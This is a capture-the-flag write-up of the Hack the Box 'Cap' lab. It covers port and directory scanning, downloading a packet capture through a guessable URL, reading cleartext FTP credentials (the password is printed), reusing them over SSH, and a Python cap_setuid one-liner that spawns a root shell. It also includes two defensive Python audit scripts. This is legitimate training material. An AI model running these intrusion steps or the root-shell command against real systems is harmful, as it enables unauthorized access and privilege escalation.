Cap Lab
Hack the Box Penetration Lab
Reconnaissance
First up, a port scan:
┌──(zero㉿zero)-[~]
└─$ rustscan 10.10.10.245
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
Faster Nmap scanning with Rust.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/home/zero/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.10.245:21
Open 10.10.10.245:22
Open 10.10.10.245:80
[~] Starting Nmap
[>] The Nmap command to be run is nmap -vvv -p 21,22,80 10.10.10.245
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-14 05:49 PDT
Initiating Ping Scan at 05:49
Scanning 10.10.10.245 [4 ports]
Completed Ping Scan at 05:49, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:49
Completed Parallel DNS resolution of 1 host. at 05:49, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 05:49
Scanning 10.10.10.245 [3 ports]
Discovered open port 80/tcp on 10.10.10.245
Discovered open port 21/tcp on 10.10.10.245
Discovered open port 22/tcp on 10.10.10.245
Completed SYN Stealth Scan at 05:49, 0.27s elapsed (3 total ports)
Nmap scan report for 10.10.10.245
Host is up, received echo-reply ttl 63 (0.13s latency).
Scanned at 2024-10-14 05:49:03 PDT for 1s
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 63
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.52 seconds
Raw packets sent: 7 (284B) | Rcvd: 6 (240B)
It looks like there are a few ports open that I might want to test. But first it's best to see where the IP address leads.
It seems to be an exposed security dashboard. Not good. Let's quickly run a feroxbuster scan and see what else I can find.
┌──(zero㉿zero)-[~]
└─$ feroxbuster -u http://10.10.10.245 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.10.245
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 4l 34w 232c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302 GET 4l 24w 208c http://10.10.10.245/data => http://10.10.10.245/
200 GET 227l 442w 7119c http://10.10.10.245/static/js/scripts.js
200 GET 5l 79w 2509c http://10.10.10.245/static/css/slicknav.min.css
200 GET 6l 16w 1718c http://10.10.10.245/static/images/author/avatar.png
200 GET 33l 160w 3547c http://10.10.10.245/static/js/plugins.js
200 GET 6l 102w 8420c http://10.10.10.245/static/js/jquery.slicknav.min.js
200 GET 132l 301w 3121c http://10.10.10.245/static/css/metisMenu.css
200 GET 10l 75w 4963c http://10.10.10.245/static/js/metisMenu.min.js
200 GET 472l 659w 5835c http://10.10.10.245/static/css/default-css.css
200 GET 151l 244w 2095c http://10.10.10.245/static/css/typography.css
200 GET 6l 64w 2936c http://10.10.10.245/static/css/owl.carousel.min.css
200 GET 16l 58w 4724c http://10.10.10.245/static/js/jquery.slimscroll.min.js
200 GET 496l 2420w 33784c http://10.10.10.245/netstat
200 GET 4l 320w 15514c http://10.10.10.245/static/js/vendor/modernizr-2.8.3.min.js
200 GET 1081l 1807w 16450c http://10.10.10.245/static/css/themify-icons.css
200 GET 5l 351w 19191c http://10.10.10.245/static/js/popper.min.js
200 GET 432l 975w 12757c http://10.10.10.245/static/js/pie-chart.js
200 GET 862l 1800w 17885c http://10.10.10.245/static/css/responsive.css
200 GET 4l 66w 29062c http://10.10.10.245/static/css/font-awesome.min.css
200 GET 354l 1049w 17369c http://10.10.10.245/ip
200 GET 2261l 5128w 65419c http://10.10.10.245/static/js/line-chart.js
200 GET 7l 279w 42766c http://10.10.10.245/static/js/owl.carousel.min.js
200 GET 2837l 5376w 53428c http://10.10.10.245/static/css/styles.css
200 GET 4l 1338w 85578c http://10.10.10.245/static/js/vendor/jquery-2.2.4.min.js
200 GET 7l 567w 48944c http://10.10.10.245/static/js/bootstrap.min.js
200 GET 7l 1513w 144877c http://10.10.10.245/static/css/bootstrap.min.css
302 GET 4l 24w 220c http://10.10.10.245/capture => http://10.10.10.245/data/1
200 GET 389l 1065w 19386c http://10.10.10.245/
302 GET 4l 24w 208c http://10.10.10.245/data/2 => http://10.10.10.245/
[####################] - 2m 62322/62322 0s found:29 errors:22
[####################] - 2m 62282/62282 509/s http://10.10.10.245/
Nothing that immediately stands out was revealed; most of the URLs link to pages I can already access. So it's time to poke around and see what the open ports can provide.
I then started to try and connect to the FTP to see if there was an anonymous login I could use.
┌──(zero㉿zero)-[~]
└─$ ftp 10.10.10.245:21
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Interestingly enough, there was a version number for the FTP server. A quick Google for exploits sadly resulted in nothing other than a way to DDoS attack it (CVE-2021-30047).
After looking around a few of the pages I noticed there was a file available to download, a pcap file to be exact.
Initially it didn’t result in too much, but the URL of the webpage made it seem like there could be additional pages of data hidden from view. If there was a data set 1, maybe there were more?
http://10.10.10.245/data/1 was the one I already had; 2, 3 and 4 didn't result in anything. But 0 did.
There were now values associated with the Data Types. Time to download this new pcap file and see what I could find!
Perfect, this file contains a ton of information that I can scan through to find something to help me get a foothold. After a brief search I discovered someone was trying to log into the FTP server that I was unable to get access to before.
36 4.126500 192.168.196.1 192.168.196.16 FTP 69 Request: USER nathan
40 5.424998 192.168.196.1 192.168.196.16 FTP 78 Request: PASS Buck3tH4TF0RM3!
A user named nathan with the password clearly written below it. Success.
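The credential lines above came from reading the capture in Wireshark. As an added example that is not part of the original writeup, this Python script does the same extraction without Wireshark: it walks a classic pcap, follows IPv4/TCP packets to port 21 and pulls out USER/PASS commands, which is the check a defender would run over their own captures to find cleartext FTP logins. The two-packet capture embedded in it is constructed to mirror the exchange shown above.

```python
import struct

FTP_PORT = 21

def _ipv4(raw):
    return ".".join(str(b) for b in raw)

def ftp_credentials_from_pcap(data):
    """Walk a classic little-endian pcap and return (src, dst, command, argument)
    for every FTP USER/PASS command sent to port 21 over IPv4/TCP."""
    if struct.unpack("<I", data[:4])[0] != 0xA1B2C3D4:
        raise ValueError("not a little-endian classic pcap (pcapng is not handled)")
    found, off = [], 24                                   # skip the 24-byte global header
    while off + 16 <= len(data):
        caplen = struct.unpack("<IIII", data[off:off + 16])[2]
        pkt = data[off + 16:off + 16 + caplen]
        off += 16 + caplen
        if len(pkt) < 34 or pkt[12:14] != b"\x08\x00":    # Ethernet frame carrying IPv4
            continue
        ip = pkt[14:]
        if ip[9] != 6:                                    # TCP only
            continue
        tcp = ip[(ip[0] & 0x0F) * 4:]
        if struct.unpack("!H", tcp[2:4])[0] != FTP_PORT:  # client -> server control channel
            continue
        payload = tcp[(tcp[12] >> 4) * 4:]
        for line in payload.split(b"\r\n"):
            cmd, _, arg = line.partition(b" ")
            if cmd.upper() in (b"USER", b"PASS"):
                found.append((_ipv4(ip[12:16]), _ipv4(ip[16:20]),
                              cmd.decode().upper(), arg.decode(errors="replace")))
    return found

def _frame(src, dst, payload):
    """Constructed Ethernet/IPv4/TCP record for the sample capture below."""
    eth = b"\x00" * 12 + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    tcp = struct.pack("!HHIIBBHHH", 40000, FTP_PORT, 1, 1, 0x50, 0x18, 1024, 0, 0)
    rec = eth + ip + tcp + payload
    return struct.pack("<IIII", 0, 0, len(rec), len(rec)) + rec

# Constructed two-packet capture mirroring the USER/PASS exchange seen in the box's pcap.
SAMPLE_PCAP = (struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
               + _frame("192.168.196.1", "192.168.196.16", b"USER nathan\r\n")
               + _frame("192.168.196.1", "192.168.196.16", b"PASS Buck3tH4TF0RM3!\r\n"))
```

To run it over a real file, pass `open("capture.pcap", "rb").read()` to `ftp_credentials_from_pcap`; a non-empty result means credentials crossed the wire unencrypted.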
After trying to log into the FTP server several times using different parameters, it always kicked me out. I am not sure why, so my next thought was to try to log in to SSH with the same credentials, since some users foolishly use the same login for everything.
┌──(zero㉿zero)-[~]
└─$ ssh nathan@10.10.10.245
nathan@10.10.10.245's password:
Permission denied, please try again.
nathan@10.10.10.245's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Oct 14 14:26:30 UTC 2024
System load: 0.48 Processes: 226
Usage of /: 36.7% of 8.73GB Users logged in: 0
Memory usage: 22% IPv4 address for eth0: 10.10.10.245
Swap usage: 0%
=> There are 4 zombie processes.
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Thu May 27 11:21:27 2021 from
nathan@cap:~$
Turns out they do use the same password. And now I have the user flag!
Privilege escalation
Now to try and get the root flag! First I am going to upload and run LinPEAS to try and find any vulnerabilities that could lead me to getting root access.
Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
After running LinPEAS on the target system, it found a misconfiguration which we could use to get root access: the python3.8 binary has file capabilities set on it. After some research it's very apparent that a python3.8 binary with the cap_setuid capability can change its own user ID, so any local user can run it as root and keep that privileged access.
nathan@cap:~$ /usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# whoami
root
After gaining root access I got the flag to finish the box! It's pretty important to make sure your binaries aren't misconfigured, allowing for this type of privilege escalation.
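As an added example that is not the writeup's own code, the following Python script shows the check an administrator would run to catch this misconfiguration before LinPEAS does: it decodes the security.capability extended attribute that setcap writes, renders it the way getcap prints it, and walks a directory tree flagging binaries whose permitted set includes cap_setuid or similar. The sample xattr value is constructed to match the python3.8 finding above; audit_tree needs Linux and a readable tree.

```python
import os
import struct

# Subset of capability numbers from linux/capability.h; anything else renders as cap_<n>.
CAP_NAMES = {0: "cap_chown", 1: "cap_dac_override", 2: "cap_dac_read_search",
             6: "cap_setgid", 7: "cap_setuid", 10: "cap_net_bind_service",
             12: "cap_net_admin", 13: "cap_net_raw", 19: "cap_sys_ptrace", 21: "cap_sys_admin"}
# Capabilities that let a process change user or otherwise cross the UID boundary.
RISKY = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace", "cap_dac_override"}
VFS_CAP_FLAGS_EFFECTIVE = 0x1

def _names(bits):                       # bit mask -> names, ordered by cap number like getcap
    return [CAP_NAMES.get(i, f"cap_{i}") for i in range(64) if bits >> i & 1]

def decode_security_capability(blob):
    """VFS cap v2/v3 xattr: u32 magic_etc, then LE {permitted, inheritable} for caps 0-31, 32-63."""
    magic_etc, = struct.unpack("<I", blob[:4])
    if magic_etc >> 24 not in (2, 3) or len(blob) < 20:
        raise ValueError("unsupported security.capability layout")
    p_lo, i_lo, p_hi, i_hi = struct.unpack("<IIII", blob[4:20])
    return {"permitted": _names(p_lo | p_hi << 32),
            "inheritable": _names(i_lo | i_hi << 32),
            "effective": bool(magic_etc & VFS_CAP_FLAGS_EFFECTIVE)}

def getcap_style(blob):
    """Render like getcap for the usual case, e.g. cap_setuid,cap_net_bind_service+eip."""
    caps = decode_security_capability(blob)
    names = list(dict.fromkeys(caps["permitted"] + caps["inheritable"]))
    flags = "".join(f for f, on in (("e", caps["effective"]), ("i", bool(caps["inheritable"])),
                                    ("p", bool(caps["permitted"]))) if on)
    return ",".join(names) + "+" + flags

def risky_caps(blob):
    """Permitted capabilities a local user could turn into a UID change."""
    return [c for c in decode_security_capability(blob)["permitted"] if c in RISKY]

def audit_tree(root="/usr"):
    """Walk root and report files whose xattr grants a risky capability (Linux only)."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                blob = os.getxattr(path, "security.capability")
            except OSError:                 # no capability xattr, or not readable
                continue
            if risky_caps(blob):
                hits.append((path, getcap_style(blob)))
    return hits

# Constructed xattr equal to what `setcap cap_setuid,cap_net_bind_service+eip` writes (v2 layout).
SAMPLE_XATTR = struct.pack("<IIIII", 0x02000001, 1 << 7 | 1 << 10, 1 << 7 | 1 << 10, 0, 0)
```

On the box itself, `audit_tree("/usr")` would return the python3.8 entry with the same `+eip` string LinPEAS printed; the fix is `setcap -r` on the binary or moving the bind-port need to a dedicated service user.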